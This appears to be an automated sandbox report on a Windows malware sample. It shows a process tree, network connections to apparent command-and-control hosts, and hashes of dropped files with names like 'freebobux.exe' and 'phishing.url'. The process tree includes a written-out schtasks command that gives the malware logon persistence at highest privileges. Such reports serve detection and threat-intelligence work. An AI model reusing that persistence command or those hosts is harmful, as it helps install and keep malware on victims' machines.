cmd /c ""C:\Users\Admin\AppData\Local\Temp\ORLHVJxSJiqt.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Windows\SysWOW64\xcopy.exe

xcopy C:\Windows\System32\WinMetadata C:\Users\Admin\Desktop

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\SysWOW64\regedit.exe

regedit

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\jD0d0HUugteK.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x584

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\EZyhRilaxK4P.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\TtFOjjU5RTQ3.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

Network

Country Destination Domain Proto
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 https-login--microsoftonline--com.httpsproxy.net udp
GB 142.250.200.19:80 https-login--microsoftonline--com.httpsproxy.net tcp
GB 142.250.200.19:80 https-login--microsoftonline--com.httpsproxy.net tcp
US 8.8.8.8:53 aadcdn.msftauth.net udp
US 152.199.21.175:443 aadcdn.msftauth.net tcp
US 152.199.21.175:443 aadcdn.msftauth.net tcp
US 152.199.21.175:443 aadcdn.msftauth.net tcp
US 8.8.8.8:53 mrbeast.codes udp
US 8.8.8.8:53 dwrapper-prod.herokuapp.com udp
IE 54.73.53.134:80 dwrapper-prod.herokuapp.com tcp
IE 54.73.53.134:80 dwrapper-prod.herokuapp.com tcp
US 8.8.8.8:53 exampledd.matomo.cloud udp
DE 18.157.122.248:80 exampledd.matomo.cloud tcp
US 8.8.8.8:53 a2957.q.akamai.net udp
GB 2.23.210.92:443 a2957.q.akamai.net tcp
FR 5.157.51.190:53 udp
ES 185.93.182.46:53 tcp
RS 152.89.160.205:983 tcp
ES 212.227.33.35:22 tcp
BG 185.216.32.42:443 tcp
US 74.208.156.127:53 tcp
DE 217.160.104.214:22 tcp
PL 5.157.22.182:22 tcp
JP 172.105.221.253:53 tcp
FR 57.128.125.147:80 57.128.125.147 tcp
US 8.8.8.8:53 ipfounder.net udp
US 8.8.8.8:53 jozzu420-51305.portmap.host udp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
US 8.8.8.8:53 trustsentry.com udp
US 8.8.8.8:53 ya.ru udp
N/A 127.0.0.1:50984 tcp
US 8.8.8.8:53 tria.ge udp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
US 8.8.8.8:53 having-jackson.gl.at.ply.gg udp
US 147.185.221.18:56522 having-jackson.gl.at.ply.gg tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
US 147.185.221.18:56522 having-jackson.gl.at.ply.gg tcp

Files

memory/2072-0-0x000000007403E000-0x000000007403F000-memory.dmp

memory/2072-1-0x0000000001210000-0x000000000126E000-memory.dmp

memory/2072-2-0x0000000000550000-0x0000000000574000-memory.dmp

memory/2072-3-0x0000000074030000-0x000000007471E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\!main.cmd

MD5 5bef4958caf537ac924b6ce01e1d1e13
SHA1 cf7a0805a98f3c16ca14c6e420e2ca44ad77a164
SHA256 e801541a9d48a9adbb720cdb5b06f9bab9b4a62f0434221876a607a7be75d28d
SHA512 9f62246e56f3461f8d180d3a4bc3ccd6187f457196b770af9c8427a3795504f6b44d2fb7a305d41d54d58e4759136426ca4f6e09771136f27d2c478aad153f99

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\f3cb220f1aaa32ca310586e5f62dcab1.pack

MD5 34a66c4ec94dbdc4f84b4e6768aebf4e
SHA1 d6f58b372433ad5e49a20c85466f9fb3627abff2
SHA256 fcf530e33a354ac1de143e2f87960e85f694e99d7aa652408c146e8d0a1430fb
SHA512 4db51769dcee999baf3048c793dde9ad86c76f09fc17edd8e2f1dedf91cf224ddfbe9554c4ff14659ea0f6663b054953ec2ab9d964e6e9ca44ee744e02b7e5b9

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\spread.cmd

MD5 7a71a7e1d8c6edf926a0437e49ae4319
SHA1 d9b7a4f0ed4c52c9fbe8e3970140b47f4be0b5f1
SHA256 e0d127c00f9679fb359c04b6238b976f1541918a0df0d6c61f1a44e8f27846ae
SHA512 96a57412bda3f16e56398cd146ece11e3d42291dceff2aec22871a7e35e3b102b27151984ae0795ca6d5ef5385ef780906d9b13cec78cbbdf019a3de4792ca3a

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\doxx.cmd

MD5 013a01835332a3433255e3f2dd8d37d6
SHA1 8a318cc4966eee5ebcb2c121eb4453161708f96c
SHA256 23923556f7794769015fb938687bf21c28ae5f562c4550c41d3d568ad608b99b
SHA512 12e9d439c8c558218d49415bbd27d0749f9f7a7e6c177074e11ac1a6f2185c22c4cf51f5a41133eaddf8a06288c352460d4450ad9702c4652ad259ed1260f42d

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\.didata

MD5 41b8ce23dd243d14beebc71771885c89
SHA1 051c6d0acda9716869fbc453e27230d2b36d9e8f
SHA256 bc86365a38e3c8472413f1656a28b04703d8c77cc50c0187ddf9d0afbb1f9bf7
SHA512 f0fb505c9f8d2699717641c3571acb83d394b0f8eee9cff80ad95060d1993f9f4d269c58eb35aae64a639054e42aaa699719b08357f7c0c057b407e2bdf775da

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\.edata

MD5 37c1a5c63717831863e018c0f51dabb7
SHA1 8aab4ebcf9c4a3faf3fc872d96709460d6bf6378
SHA256 d975b12871fc3f217b71bb314e5e9ea6340b66ece9e26a0c9cbd46de22368941
SHA512 4cf2b8efa3c4520cc80c4d560662bddbe4071b6908d29550d59bcda94c8b80a282b5e0b4536a88331a6a507e8410ccb35f4e38d0b571960f822bda7b69e4bb19

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\.idata

MD5 a73d686f1e8b9bb06ec767721135e397
SHA1 42030ea2f06f38d5495913b418e993992e512417
SHA256 a0936d30641746144eae91e37e8cbed42dc9b3ee3e5fdda8e45ad356180f0461
SHA512 58942400f6b909e42d36187fd19d64a56b92c2343ed06f6906291195fea6fe5a79fc628cbfc7c64e09f0196cbaba83dc376985ceef305bd0a2fadaca14b5c9e5

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\0.txt

MD5 c1672053cdc6d8bf43ee7ac76b4c5eee
SHA1 fc1031c30cc72a12c011298db8dc9d03e1d6f75c
SHA256 1cdb267b3e66becf183e9e747ae904e8684bab519041f39f9bd0b7dd0b3c66cb
SHA512 12e64a77c5b07d1f0fe1f07a6bf01078373d99bb7372a2d8a5c44fdbf753b44381f112822c1f75475e762d85fcf806487925860941005d342473ec90f9997633

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\.txt

MD5 8f2f090acd9622c88a6a852e72f94e96
SHA1 735078338d2c5f1b3f162ce296611076a9ddcf02
SHA256 61da25d2beb88b55ef629fab530d506a37b56cfabfa95916c6c5091595d936e4
SHA512 b98fbb6d503267532d85bf0eb466e4e25169baefafdaaa97bdc44eaab2487419fde106626c0cc935ba59bcb4472597e23b3c21e3347ed32de53c185739735404

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\CERTIFICATE.cer

MD5 c07164d3b38ca643290adaa325e1d842
SHA1 895841abf68668214e5c8aa0a1600ff6b88e299d
SHA256 da5dd4622c1c9054dc2c01cb36d26802ffbd3345e8cf8a20a2e8d7a859251600
SHA512 92922192fdca0b6a0a6634415fd0ccdd32087584b7b2ea0a1e550b8bf9a5c8fe79401fadc0de8d4d340ef700a01079b51529adcab576f0ca17a864748ae39118

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\data.txt

MD5 4c195d5591f6d61265df08a3733de3a2
SHA1 38d782fd98f596f5bf4963b930f946cf7fc96162
SHA256 94346a0e38b0c2ccd03cf9429d1c1bce2562c29110bb29a9b0befc6923618146
SHA512 10ee2e62ca1efa1cda51ca380a36dfabdd2e72cec41299369cac95fc3864ca5f4faa959f70d2b2c145430e591b1249f233b31bd78ba9ee64cf0604c887b674d7

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\i.txt

MD5 d40fc822339d01f2abcc5493ac101c94
SHA1 83d77b6dc9d041cc5db064da4cae1e287a80b9e6
SHA256 b28af33bc028474586bb62da7d4991ddd6f898df7719edb7b2dfce3d0ea1d8c6
SHA512 5701c2a68f989e56e7a38e13910421c8605bc7b58ae9b87c1d15375829e100bad4ac86186f9d5670c9a5e0dd3e46f097d1d276e62d878e0c2f6eb5f6db77dd46

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\_.txt

MD5 ad6e46e3a3acdb533eb6a077f6d065af
SHA1 595ad8ee618b5410e614c2425157fa1a449ec611
SHA256 b68ad9b352910f95e5496032eea7e00678c3b2f6b0923eb88a6975ef52daf459
SHA512 65d1f189e905419cc0569fd7f238af4f8ba726a4ddad156345892879627d2297b2a29213ac8440756efb1d7aaead1c0858462c4d039b0327af16cbb95840a1e8

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\2\CODE2000.TTF

MD5 052eaff1c80993c8f7dca4ff94bb83ca
SHA1 62a148210e0103b860b7c3257a18500dff86cb83
SHA256 afabc4e845085d6b4f72a9de672d752c002273b52221a10caf90d8cb03334f3c
SHA512 57209c40b55170da437ab1120b2f486d698084d7d572b14889b2184e8327010a94eee25a86c9e0156ba12ed1a680507016390f059f265cceb3aa8698e8e94764

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\2\readme.txt

MD5 d6b389a0317505945493b4bfc71c6d51
SHA1 a2027bc409269b90f4e33bb243adeb28f7e1e37b
SHA256 d94ed2f7aa948e79e643631e0cd73cf6a221790c05b50ad1d6220965d85ac67c
SHA512 4ea3c8bdee2b9e093d511a7e4ded557f182df8d96e798cb9ee95014f3b99ebd21f889516e5f934033b01b7ca1e26f5444f2e6be0cc0d7fba0b3faa4cea40e187

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\3\IMG_1344.MP4

MD5 038725879c68a8ebe2eaa26879c65574
SHA1 34062adf5ac391effba12d2cfd9f349b56fd12dc
SHA256 eec8517fe10284368ed5c5b38b7998f573cc6a9d06ae535fe0057523819788be
SHA512 7b494cd77cb3f2aff8fd6aa68a9ba5cfc87fcaefa36b882e2f930bf82029526257c41a5205364cafc66f4c0f5d154cc1dfe44a6db06952075047975e2156e564

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\3\IMG_1598.MP4

MD5 808c2e1e12ddd159f91ed334725890f4
SHA1 96522421df4eb56c6d069a29fa4e1202c54eb4e4
SHA256 5588c6bf5b74c0a8b088787a536ef729bcedaedfc554ef317beea7fca3b392f7
SHA512 f6205b07c68f3b6abe7daf0517fbc07def4cb471bd754cd25333f5301dc9f1ac439217c6a09c875376ece4f6fb348e8b9e44e6e8a813ac5d8078cedc5b60bb3c

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\3\IMG_1599.MP4

MD5 06947b925a582d2180ed7be2ba196377
SHA1 34f35738fdf5c51fa28093ee06be4c12fcbd9fda
SHA256 b09bd14497d3926dc3717db9a3607c3cec161cc5b73c1af7e63d9ccce982a431
SHA512 27f6e3882db9f88834023ff3ece9f39cb041548e772af89d49c97fea7d7ceb4f2efdc019a89c0edf3308929a88fd488749fec97c63b836de136c437300b9ff73

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\3\IMG_1689.MP4

MD5 1e5c2785bd0dd68ba46ddca622960eb5
SHA1 f99901491d60b748c470dca28f4f7d423eaa42e0
SHA256 1e199487c53b09a93d573ff9eee56aadb70de38ffa8d2d89001dca9ab8fdac96
SHA512 dbb768da8ddc14b5ffbda956258296a4f94cb49775c03cfe5f9e64e402938ec1c045685a14e44294cb31520c4c389d6c742f3f47e2acb46d0d9e96ec1ff4c58e

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\3\IMG_1741.MP4

MD5 5bf2d9277e2aaaf852d4b65d1e9bba67
SHA1 5d8876a9c641fc67b1f5fd23da079952fa879cfd
SHA256 3fbbdfbaa057533ad30787257bd31252fad8bfaaafabcd78473196d9b8fc6820
SHA512 848e43d7b0968b0e096e01078db51e029dc8014800a738fee43e39c7bf76ee616347424349a9a5a79af1af46c7f8c01501a6765746326f41a69791de5300523c

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\3\IMG_1870.MP4

MD5 092a111c6a159e3cb263fdaa9781c9d5
SHA1 fdeeb752db60e5e299e54b46c932908507dd2615
SHA256 54ca5ae616974ce576379652479c7b74817c6ed35ba150e5fa19ca92c995324c
SHA512 24a27b7c3b92607aa69aa2a329b1063278d48ef6d61baa6f3fa41ec50aa36968bc5897e0c2db22e1fc6b9e92a11365b796f2c47197b4c1187e953535fdd40982

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\3\IMG_5068.MP4

MD5 91eb9128663e8d3943a556868456f787
SHA1 b046c52869c0ddcaec3de0cf04a0349dfa3bd9c3
SHA256 f5448c8e4f08fa58cb2425ab61705ade8d56a6947124dea957941e5f37356cd3
SHA512 c0d7196f852fc0434b2d111e3cf11c9fd2cb27485132b7ce22513fe3c87d5ad0767b8f35c36948556bce27dcc1b4aa21fbb21414637f13071d45f18c9ae32bf6

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\3\IMG_5049.MP4

MD5 1649d1b2b5b360ee5f22bb9e8b3cd54c
SHA1 ae18b6bf3bfa29b54fee35a321162d425179fc7e
SHA256 d1304d5a157d662764394ca6f89dcad493c747f800c0302bbd752bf61929044e
SHA512 c77b5bad117fda5913866be9df54505698f40ef78bf75dad8a077c33b13955222693e6bc5f4b5b153cfb54ff4d743403b1fd161270fa01ad47e18c2414c3d409

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\3\IMG_5343.MP4

MD5 180722cbf398f04e781f85e0155fa197
SHA1 77183c68a012f869c1f15ba91d959d663f23232d
SHA256 94e998cedbbb024b3c7022492db05910e868bb0683d963236163c984aa88e02a
SHA512 bbece30927da877f7c103e0742466cda4b232fb69b2bf8ebe66a13bf625f5a66e131716b3a243bb5e25d89bd4bde0b004da8dd76200204c67a3d641e8087451d

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\61b13e8da79fd7d9f190f23f96c189db.dll

MD5 6ed35e30e6f986f74ef63999ea6a3033
SHA1 88af7462758ff24635f127b6d7ea6791ee89ab40
SHA256 b18d9f97d3f8a8f7fa295d9a81f6282630c687c9ba4066f6c40ed86a8502ccb2
SHA512 bcb0db406af39338e051285aa4dbadd421e7c2bd538714688c9fa52e70c69f38ab30cf97a62b10c4d2f3516e28e15fb63c2e4c455f894d4968dc4a2bb25b0dab

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\beastify.url

MD5 94c83d843db13275fab93fe177c42543
SHA1 4fc300dd7f3c3fb4bdcb1a2f07eea24936d843e5
SHA256 783a6de56d4538e4e2dfa0c1b4b69bdda1c119a559241807ddfdeece057f7b2e
SHA512 5259a5b9473e599fd5092d67710cb71caf432e397155fda136ded39bb0c03aa88c68e6e50ca3eba13ec6124c791a4d64c5fed701a46cdc651c2261ac8436b1fe

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\ac3.exe

MD5 7ecfc8cd7455dd9998f7dad88f2a8a9d
SHA1 1751d9389adb1e7187afa4938a3559e58739dce6
SHA256 2e67d5e7d96aec62a9dda4c0259167a44908af863c2b3af2a019723205abba9e
SHA512 cb05e82b17c0f7444d1259b661f0c1e6603d8a959da7475f35078a851d528c630366916c17a37db1a2490af66e5346309177c9e31921d09e7e795492868e678d

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bg.png

MD5 6838598368aa834d27e7663c5e81a6fa
SHA1 d4d2fc625670cb81e4c8e16632df32c218e183ce
SHA256 0e0e9bf5c3c81b522065e2c3bdc74e5c6e8c422230a1fe41f3bc7bef4f21604e
SHA512 f60cbad5f20418bb244206ae5754e16deac01f37f6cbbb5d0d7c916f0b0fef7bdeaf436a74056e2a2042e3d8b6c1da4bc976a32f604c7d80a57528583f6c5e47

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\cipher.cmd

MD5 c2fd32ef78ee860e8102749ae2690e44
SHA1 6707151d251074738f1dd0d19afc475e3ba28b7e
SHA256 9f7f2a48b65dc8712e037fdbbdeae00adad6a417750c76cdc3ea80bdd0fa1bc5
SHA512 395483f9394a447d4a5899680ca9e5b4813ac589a9d3ff25b940adaf13e000b0512895d60039948dc51c44a9954cfadac54fd9bd4294d7252acdec024eebc645

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\ed64c9c085e9276769820a981139e3c2a7950845.dll

MD5 6eb191703124e29beca826ee2a0f2ed7
SHA1 a583c2239401a58fab2806029ef381a67c8ea799
SHA256 db6572b105c16b9bc657e457e13284926f28b40ea0c6736ae485c3cd0690110a
SHA512 c50fd03d1bf77b44c17d20fa8966d1f31ba7cea478f9fd6e0ffd862bcd039ed1a853138e2493ad7edeffa1ad512c96fdd54f66b25926a5687da580804440b045

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\freebobux.exe

MD5 794b00893a1b95ade9379710821ac1a4
SHA1 85c7b2c351700457e3d6a21032dfd971ccb9b09d
SHA256 5ac42d75e244d33856971120a25bd77f2c0712177384dfa61fb90c0e7790d34c
SHA512 3774d4aed0cce7ed257d31a2bb65dda585d142c3c527dc32b40064d22d9d298dd183c52603561c9c1e96dd02737a8b2237c433cf7a74dccb0a25191446d60017

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\handler.cmd

MD5 c1e3b759a113d2e67d87468b079da7dc
SHA1 3b280e1c66c7008b4f123b3be3aeb635d4ab17c3
SHA256 b434261414e7c75437e8c47aba9a5b73fcb8cffbf0870998f50edc46084d1da5
SHA512 20a1494027a5cf10f4cc71722a7a4e685fc7714ba08598dd150c545f644e139ddb200fb0b5517f5491a70d8644e90c8f60e8c457bc5d8eb0bb451120b40b8447

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\phishing.url

MD5 6f62e208aad51e2d5ef2a12427b36948
SHA1 453eaf5afef9e82e2f50e0158e94cc1679b21bea
SHA256 cf0b709df6dfcb49d30e8bc0b9893aa9bd360e5894e08915b211829d2ae8536b
SHA512 f4732026625df183377c0c32baec3b663582d59ae59687d426d7637b5d701b3a169e0769b0106f8d9d8b42691697f12d0ed73a607f7bcd99d1f210ec98408501

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\Macro_blank.png

MD5 d388dfd4f8f9b8b31a09b2c44a3e39d7
SHA1 fb7d36907e200920fe632fb192c546b68f28c03a
SHA256 a917ddc25d483b737296f945b8b7701a08d4692d0d34417fe1b590caac28359c
SHA512 2fcff4775a0e93c53b525b44aadefe4532efd790c504d0343626a7322a7c99073ed645eb08bd13b31e752e09c13f07b74e43f0eb1c46be082efc948b34364401

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\lupa.png

MD5 0a9d964a322ad35b99505a03e962e39a
SHA1 1b5fed1e04fc22dea2ae82a07c4cfd25b043fc51
SHA256 48cdea2dd75a0def891f0d5a2b3e6c611cfe0985125ac60915f3da7cacb2cd2b
SHA512 c4c9f019928f5f022e51b3f8eb7a45f4a35e609c66a41efc8df937762b78a47fc91736fac1a03003ca85113411f4b647a69605e66c73c778d98c842799e65d0d

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\jkka.exe

MD5 42e4b26357361615b96afde69a5f0cc3
SHA1 35346fe0787f14236296b469bf2fed5c24a1a53d
SHA256 e58a07965ef711fc60ab82ac805cfc3926e105460356dbbea532ba3d9f2080eb
SHA512 fb8a2f4a9f280c0e3c0bb979016c11ea217bae9cebd06f7f2b5ef7b8973b98128ebc2e5cf76b824d71b889fca4510111a79b177dab592f332131f0d6789673a5

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\jaffa.exe

MD5 6b1b6c081780047b333e1e9fb8e473b6
SHA1 8c31629bd4a4ee29b7ec1e1487fed087f5e4b1de
SHA256 e649b6e4284404bfa04639b8bf06367777c48201ef27dcdc256fe59167935fac
SHA512 022d40c1801fa495c9298d896221c8eefbad342d41922df8d014f2f49c3fe7fa91d603e0ee0de6be6f2143f9e0c4a6756b19260166ebd62ec3e1c64ad22bc447

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\install.exe

MD5 1e800303c5590d814552548aaeca5ee1
SHA1 1f57986f6794cd13251e2c8e17d9e00791209176
SHA256 7d815f37d808bc350a3c49810491d5df0382409347ebae7a3064a535d485c534
SHA512 138009bc110e70983d2f7f4e0aba0ee7582b46491513aae423461b13c5a186efcf8cdf82a91980302d1c80e7bae00e65fb52a746a0f9af17a8eb663be04bb23e

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\helper.vbs

MD5 7a97744bc621cf22890e2aebd10fd5c8
SHA1 1147c8df448fe73da6aa6c396c5c53457df87620
SHA256 153fed1733e81de7f9d221a1584a78999baa93bc8697500d8923550c774ed709
SHA512 89c73b73d4b52cf8e940fa2f1580fdc89f902b1eeb4b2abc17f09229a6130532a08cdb91205b9813a65cb7cd31ca020fe728b03d9a0fabb71131864c2966f967

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\punishment.cmd

MD5 c8d2a5c6fe3c8efa8afc51e12cf9d864
SHA1 5d94a4725a5eebb81cfa76100eb6e226fa583201
SHA256 c2a655fef120a54658b2559c8344605a1ca4332df6079544ff3df91b7ecadbdb
SHA512 59e525a5296160b22b2d94a3a1cfb842f54fc08a9eb3dbcda7fd9e7355842eae86b7d478175fc06ee35d7836110e1091522daf523aeb2e6d851ee896770cd8b5

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\punishment.vbs

MD5 c38e912e4423834aba9e3ce5cd93114b
SHA1 eab7bf293738d535bb447e375811d6daccc37a11
SHA256 c578d53f5dd1b954bce9c4a176c00f6f84424158b9990af2acb94f3060d78cc1
SHA512 5df1c1925d862c41822b45ae51f7b3ed08e0bc54cb38a41422d5e3faf4860d3d849b1c9bbadffa2fc88ee41a927e36cd7fcf9cd92c18753e3e2f02677ec50796

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\readme.md

MD5 5ae93516939cd47ccc5e99aa9429067c
SHA1 3579225f7f8c066994d11b57c5f5f14f829a497f
SHA256 f815e2d4180ba6f5d96ab9694602ac42cde288b349cf98a90aad9bd76cc07589
SHA512 c2dd5a075d1d203d67752a3fff5661863d7da6c2d3d88f5d428f0b32c57df750c24459a782174b013a89bbfbf84d8fb964a2bec06fc0609dc44cc10519e62713

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\Read Me.txt

MD5 1f2db4e83bbb8ed7c50b563fdfbe6af4
SHA1 94da96251e72d27849824b236e1cf772b2ee95fd
SHA256 44a2236b5c5fe30f599be03643129106852a061bb1546ff28ca82fa0a9c3b00b
